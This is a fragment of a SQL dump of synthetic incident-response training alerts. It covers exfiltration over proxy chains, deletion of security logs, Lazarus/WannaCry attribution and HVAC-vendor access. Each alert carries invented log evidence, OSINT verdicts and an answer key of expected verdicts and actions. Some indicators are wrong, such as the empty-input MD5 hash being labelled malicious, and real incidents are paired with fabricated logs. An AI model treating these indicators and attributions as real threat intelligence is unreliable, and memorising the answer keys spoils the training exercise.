1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:23Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"source_ip\\\":\\\"10.1.2.3\\\",\\\"destination_ip\\\":\\\"192.168.10.5\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"network_admin\\\",\\\"action\\\":\\\"login_attempt\\\",\\\"result\\\":\\\"success\\\",\\\"file_transferred\\\":\\\"exploit_tool_v2.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"target_system\\\":\\\"192.168.10.5\\\",\\\"protocol\\\":\\\"SMB\\\",\\\"notes\\\":\\\"Possible use of stolen credentials to access sensitive systems.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(568, 'Data Exfiltration via Proxy Chains', 'high', 'Proxy Server Logs', 'Sensitive data, including unreleased films and executive emails, is exfiltrated using complex proxy chains to obfuscate the attack origin. This operation is linked to the Lazarus Group, known for using destructive malware and financial theft tactics.', 'Data Theft', 'T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Pr', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.56\",\"proxy_chain\":[\"10.1.1.1\",\"172.16.0.5\",\"203.0.113.56\"],\"username\":\"jdoe\",\"file_exfiltrated\":\"executive_emails.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data theft activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"executive_emails.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_filesystem\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file targeted for 
exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_database\",\"verdict\":\"internal\",\"details\":\"Internal user account possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.196Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.56\\\",\\\"proxy_chain\\\":[\\\"10.1.1.1\\\",\\\"172.16.0.5\\\",\\\"203.0.113.56\\\"],\\\"username\\\":\\\"jdoe\\\",\\\"file_exfiltrated\\\":\\\"executive_emails.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(569, 'Destruction of Evidence', 'medium', 'System Log Analysis', 'An attempt to delete system logs to erase traces of a cyberattack was detected. The action is suspected to be part of a cover-up strategy by the attackers to complicate forensic investigations.', 'Log Deletion', 'T1070.004 - Indicator Removal on Host: File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:45Z\",\"eventID\":\"4625\",\"log_name\":\"Security\",\"message\":\"A deletion event was detected on the system logs located at C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx.\",\"user\":\"malicious_actor\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.12\",\"deleted_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"process_name\":\"cmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company internal IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"System Logs\",\"verdict\":\"suspicious\",\"details\":\"Critical system log file targeted for deletion.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lazarus Group\'s malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'IR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.197Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T14:22:45Z\\\",\\\"eventID\\\":\\\"4625\\\",\\\"log_name\\\":\\\"Security\\\",\\\"message\\\":\\\"A deletion event was detected on the system logs located at 
C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx.\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.10.12\\\",\\\"deleted_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\winevt\\\\\\\\Logs\\\\\\\\Security.evtx\\\",\\\"process_name\\\":\\\"cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(570, 'Analysis of Geopolitical Motivations', 'high', 'Geopolitical Reports', 'This alert focuses on analyzing the geopolitical factors linking the recent cyber attack to North Korea\'s strategic goals and financial needs, specifically attributed to the Lazarus Group. The attack employed destructive malware and financial theft tactics.', 'Threat Intelligence Analysis', 'T1485: Data Destruction, T1589: Gather Victim Identity Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:35Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"malware_name\":\"WannaCry\",\"attacker_domain\":\"malicious-nk-group.com\",\"user\":\"jdoe\",\"filename\":\"ransomware_payload.exe\",\"action\":\"Data exfiltration attempt detected\",\"indicators\":[{\"indicator_type\":\"ip\",\"value\":\"203.0.113.45\",\"role\":\"attacker\"},{\"indicator_type\":\"hash\",\"value\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"role\":\"malware\"}]}', '2026-01-07 22:40:38', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address linked to North Korean threat actor group Lazarus\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt 
detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt 
detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:22.198Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:23:35Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malware_hash\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"malware_name\\\":\\\"WannaCry\\\",\\\"attacker_domain\\\":\\\"malicious-nk-group.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"ransomware_payload.exe\\\",\\\"action\\\":\\\"Data exfiltration attempt detected\\\",\\\"indicators\\\":[{\\\"indicator_type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"role\\\":\\\"attacker\\\"},{\\\"indicator_type\\\":\\\"hash\\\",\\\"value\\\":\\\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\\\",\\\"role\\\":\\\"malware\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(571, 'Compromised HVAC Vendor Access', 'high', 'Firewall logs', 'FIN7 initiated an attack by exploiting a vulnerability in the HVAC vendor\'s network, providing an entry point into Target\'s infrastructure. The attack was detected through unusual traffic patterns in the firewall logs, originating from a known malicious IP associated with FIN7 operations.', 'Initial Access', 'T1199: Trusted Relationship', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TCP\",\"action\":\"allowed\",\"username\":\"hvac_vendor\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"malicious_update.exe\",\"event_id\":\"FW-0002345678\",\"message\":\"Unusual traffic from trusted HVAC vendor IP\"}', '2026-01-08 22:01:14', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known FIN7 C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"HVAC vendor access point\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Identified as malware associated with FIN7\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Filename known to be used by FIN7\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"hvac_vendor\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Recognized 
vendor account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
